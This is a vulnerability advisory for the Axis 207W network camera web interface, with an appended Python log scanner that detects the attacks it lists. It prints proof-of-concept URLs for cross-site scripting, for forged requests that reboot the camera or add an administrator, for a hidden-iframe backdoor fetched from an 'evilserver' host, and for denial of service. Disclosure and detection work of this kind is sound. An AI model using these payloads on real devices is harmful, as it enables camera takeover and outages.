Axis Communications 207W Network Camera Web Interface Vulnerabilities
BID:25678
Info
| Field | Value |
| --- | --- |
| Bugtraq ID: | 25678 |
| Class: | Unknown |
| CVE: | CVE-2007-4930 CVE-2007-4927 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 14 2007 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | Discovery is credited to Seth Fogie. |
| Vulnerable: | Axis Communications 207W Network Camera 0 |
| Not Vulnerable: | |
Discussion
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.
Exploit / POC
The following examples were provided:
Cross-site scripting:
http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>
Cross-site request forgery:
1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi
2. Add a new administrator - http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.shtml%3Fpageclose%3D1
3. Root the camera/add a backdoor - http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe src=http://www.evilserver.com/wifi/axisrb.htm><!--
Denial of service:
http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>
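Added here as a detection aid for the patterns listed above; it is not part of the advisory or of any Axis software. The scanner classifies camera access-log lines, using the Referer header to separate admin CGI requests driven from a page the camera did not serve (the cross-site request-forgery case) from ones issued from the camera's own pages; the combined log format, the camera host 192.168.1.20 and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format with Referer); the hosts,
# IPs and timestamps are assumptions, the request paths come from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2007:10:01:02 +0000] "GET /axis-cgi/admin/restart.cgi HTTP/1.1" 200 12 "http://www.evilserver.com/wifi/axisrb.htm"
10.0.0.5 - - [14/Sep/2007:10:01:03 +0000] "GET /axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1 HTTP/1.1" 200 12 "http://www.evilserver.com/wifi/axisbd.php"
10.0.0.7 - - [14/Sep/2007:10:02:00 +0000] "GET /incl/image_incl.shtml?camNo=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-"
10.0.0.9 - - [14/Sep/2007:10:03:00 +0000] "GET /axis-cgi/buffer/command.cgi?do=start&buffername=b1 HTTP/1.1" 200 5 "-"
10.0.0.2 - - [14/Sep/2007:10:04:00 +0000] "GET /axis-cgi/admin/restart.cgi HTTP/1.1" 200 12 "http://192.168.1.20/admin/maintenance.shtml"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
                    r' \d+ \S+ "(?P<referer>[^"]*)"')
# State-changing CGIs the advisory shows being driven by a plain GET.
ADMIN_CGI = {"/axis-cgi/admin/restart.cgi", "/axis-cgi/admin/pwdgrp.cgi"}
BUFFER_CGI = "/axis-cgi/buffer/command.cgi"
XSS_PAGE = "/incl/image_incl.shtml"
SCRIPT_RE = re.compile(r"<\s*/?\s*script", re.I)


def classify(line, camera_host="192.168.1.20"):
    """Return a finding tag for one log line, or None if it is unremarkable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    ref_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
    if url.path in ADMIN_CGI:
        # Admin action whose Referer is a page the camera did not serve:
        # the cross-site request-forgery pattern from the advisory.
        if ref_host is not None and ref_host != camera_host:
            return "csrf_admin_action"
        return "admin_action"
    if url.path == BUFFER_CGI and parse_qs(url.query).get("do") == ["start"]:
        return "buffer_start"  # count these per client to spot the DoS pattern
    if url.path == XSS_PAGE and SCRIPT_RE.search(unquote(url.query)):
        return "xss_attempt"
    return None


def scan(log_text, camera_host="192.168.1.20"):
    """Group client IPs by finding tag across a whole log."""
    findings = {}
    for line in log_text.splitlines():
        tag = classify(line, camera_host)
        if tag:
            findings.setdefault(tag, []).append(LOG_RE.match(line)["ip"])
    return findings
```

A request to an admin CGI with no Referer at all is reported as a plain admin action, so a rule that alerts on it should also consider the client address.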
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Axis 207 Network Camera (Axis Communications)
- Owning the Wireless Camera (and Its User) (InformIT)
- Axis 207W Wireless Camera Web Interface - Multiple Vulnerabilities (Seth Fogie)